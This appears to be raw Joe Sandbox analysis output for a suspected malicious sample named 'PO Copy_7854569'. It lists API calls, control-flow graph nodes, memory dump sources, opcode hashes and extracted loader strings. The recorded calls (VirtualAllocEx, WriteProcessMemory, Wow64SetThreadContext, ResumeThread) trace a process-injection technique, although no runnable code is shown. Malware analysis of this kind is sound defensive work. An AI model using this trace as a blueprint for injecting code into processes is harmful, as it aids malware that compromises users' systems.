                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0

                            Control-flow Graph

                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 016B5D79
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 699 76e8c60-76e8c64 700 76e8c3a-76e8c51 699->700 701 76e8c66-76e8cb6 699->701 703 76e8cb8-76e8cc4 701->703 704 76e8cc6-76e8d05 WriteProcessMemory 701->704 703->704 707 76e8d0e-76e8d3e 704->707 708 76e8d07-76e8d0d 704->708 708->707
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076E8CF8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076E8CF8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076E8DD8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BD70F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076E8B4E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076E8DD8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076E8B4E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BD70F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076E8C16
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016BB479,00000800,00000000,00000000), ref: 016BB68A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016BB479,00000800,00000000,00000000), ref: 016BB68A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076E8C16
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016BB479,00000800,00000000,00000000), ref: 016BB68A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 016BB3FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 076EBCF5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 076EBCF5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983904209.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_148d000_PO Copy_7854569.jbxd
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983904209.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_148d000_PO Copy_7854569.jbxd
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: }Y<
                            • API String ID: 0-4108299924
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11d93bcb96e575113eba16c4c3cde95b0c7ebad4122df48a3593f35a50b1cf0f
                            • Instruction ID: b32487513f85f56369f81e68b8475c5d381a80ae865df6156d55b215bfb2d307
                            • Opcode Fuzzy Hash: 11d93bcb96e575113eba16c4c3cde95b0c7ebad4122df48a3593f35a50b1cf0f
                            • Instruction Fuzzy Hash: EFE137B4E011198FCB14DFA9C5809AEFBB6FF89305F248169D415AB356D730AD82CFA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: afafea0f6f8423dc7dfd6f176bffb460fdd743fae1e5c7badae68978f168d64d
                            • Instruction ID: 14e97a0b2a6765cc67c5ab32786bdac9017607e0acac6f822728bd045b6b8f75
                            • Opcode Fuzzy Hash: afafea0f6f8423dc7dfd6f176bffb460fdd743fae1e5c7badae68978f168d64d
                            • Instruction Fuzzy Hash: 8DE117B4E0111A8FDB14DFA9C5809AEBBF6FF89305F248169D415AB356D730AD82CF60
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 021d65cc9858bb5fbbaa34d09a4b4c769d83900e725c3a9abcec593a51be6c48
                            • Instruction ID: 7a1cbf268731baa1e4b78198fd3b809532193d2ac6a83ecdda76552870f95bbe
                            • Opcode Fuzzy Hash: 021d65cc9858bb5fbbaa34d09a4b4c769d83900e725c3a9abcec593a51be6c48
                            • Instruction Fuzzy Hash: 92E117B4E011198FDB14DFA9C5809AEFBB6FF89305F248169D415AB356D730AD82CFA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ff02c87e9f145e58d00623b293d59b2023d0074885fe7616c29b2756ed92f092
                            • Instruction ID: becdb16fb81c134edd62790d09572f3a254fdec9c0941c5cf25586e358966346
                            • Opcode Fuzzy Hash: ff02c87e9f145e58d00623b293d59b2023d0074885fe7616c29b2756ed92f092
                            • Instruction Fuzzy Hash: 28A15F32E002158FCF19DFB5CC805DEBBB2FF85300B1545AAE906AB265DB32D995CB40
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b8b2e4f299081a0e6b3684256c9a8c55ce3adf44484f9a6a0ab774e92fe90f8c
                            • Instruction ID: 053085a43a51bb17e91f53c1792afa26b4f20a9e24f69c4ef2afecf0e15c24f6
                            • Opcode Fuzzy Hash: b8b2e4f299081a0e6b3684256c9a8c55ce3adf44484f9a6a0ab774e92fe90f8c
                            • Instruction Fuzzy Hash: CB513BB4E012198FDB14CFA9C9805AEFBB6FF89305F248169D419AB356D7309A41CFA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed063195d0ad3a513e5d9f8ae335d75cc3e744a3bd787a889672c955f3fe6fff
                            • Instruction ID: 05063d3fb8faaceab4fa2fccb582488461a974dd12ecbd11199c07726bbf931b
                            • Opcode Fuzzy Hash: ed063195d0ad3a513e5d9f8ae335d75cc3e744a3bd787a889672c955f3fe6fff
                            • Instruction Fuzzy Hash: F65117B4E012198BDB14CFA9C9805AEBBF6EF89305F24C1A9D419A7356D7309E42CF61

                            Execution Graph

                            Execution Coverage:1.1%
                            Dynamic/Decrypted Code Coverage:5.4%
                            Signature Coverage:8.5%
                            Total number of Nodes:130
                            Total number of Limit Nodes:8

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 46 417253-41726f 47 417277-41727c 46->47 48 417272 call 42d9e3 46->48 49 417282-417290 call 42df03 47->49 50 41727e-417281 47->50 48->47 53 4172a0-4172b1 call 42c3a3 49->53 54 417292-41729d call 42e1a3 49->54 59 4172b3-4172c7 LdrLoadDll 53->59 60 4172ca-4172cd 53->60 54->53 59->60
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172C5
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 89 42ae13-42ae4f call 4048b3 call 42beb3 NtClose
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 103 1672b60-1672b6c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 105 1672df0-1672dfc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 104 1672c70-1672c7c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 106 16735c0-16735cc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: <>P?
                            • API String ID: 0-3113296118

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(HH-71hzM,00000111,00000000,00000000), ref: 004138EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: HH-71hzM$HH-71hzM
                            • API String ID: 1836367815-1059082789

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 15 413873-413885 16 41388d-4138dd call 42d793 call 417253 call 404823 call 4240e3 15->16 17 413888 call 42cd83 15->17 26 4138fd-413903 16->26 27 4138df-4138ee PostThreadMessageW 16->27 17->16 27->26 28 4138f0-4138fa 27->28 28->26
                            APIs
                            • PostThreadMessageW.USER32(HH-71hzM,00000111,00000000,00000000), ref: 004138EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: HH-71hzM$HH-71hzM
                            • API String ID: 1836367815-1059082789

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 62 417246-417247 63 417249-41727c call 42d9e3 62->63 64 417298-41729d call 42e1a3 62->64 69 417282-417290 call 42df03 63->69 70 41727e-417281 63->70 71 4172a0-4172b1 call 42c3a3 64->71 69->71 78 417292-417297 69->78 76 4172b3-4172c7 LdrLoadDll 71->76 77 4172ca-4172cd 71->77 76->77 78->64
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172C5
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 84 42b163-42b1a4 call 4048b3 call 42beb3 RtlFreeHeap
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F445C77A,00000007,00000000,00000004,00000000,00416B30,000000F4,?,?,?,?,?), ref: 0042B19F
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 79 42b113-42b154 call 4048b3 call 42beb3 RtlAllocateHeap
                            APIs
                            • RtlAllocateHeap.NTDLL(?,0041DAAB,?,?,00000000,?,0041DAAB,?,?,?), ref: 0042B14F
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 42b1b3-42b1ef call 4048b3 call 42beb3 ExitProcess
                            APIs
                            • ExitProcess.KERNEL32(?,00000000,?,?,6F74F5A5,?,?,6F74F5A5), ref: 0042B1EA
                            Memory Dump Source
                            • Source File: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_PO Copy_7854569.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 99 1672c0a-1672c0f 100 1672c11-1672c18 99->100 101 1672c1f-1672c26 LdrInitializeThunk 99->101
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2160512332
                            Strings
                            • Thread is in a state in which it cannot own a critical section, xrefs: 016A5543
                            • Critical section address., xrefs: 016A5502
                            • Address of the debug info found in the active list., xrefs: 016A54AE, 016A54FA
                            • Critical section debug info address, xrefs: 016A541F, 016A552E
                            • Thread identifier, xrefs: 016A553A
                            • undeleted critical section in freed memory, xrefs: 016A542B
                            • Critical section address, xrefs: 016A5425, 016A54BC, 016A5534
                            • corrupted critical section, xrefs: 016A54C2
                            • 8, xrefs: 016A52E3
                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016A54E2
                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016A540A, 016A5496, 016A5519
                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016A54CE
                            • Invalid debug info address of this critical section, xrefs: 016A54B6
                            • double initialized or corrupted critical section, xrefs: 016A5508
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                            Strings
                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 016A2498
                            • @, xrefs: 016A259B
                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 016A2409
                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 016A2412
                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016A22E4
                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 016A2506
                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016A25EB
                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 016A261F
                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016A24C0
                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 016A2602
                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 016A2624
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
